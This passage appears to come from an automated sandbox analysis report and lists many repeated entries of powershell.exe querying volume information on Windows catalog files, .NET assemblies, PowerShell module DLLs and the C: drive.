      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0210~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
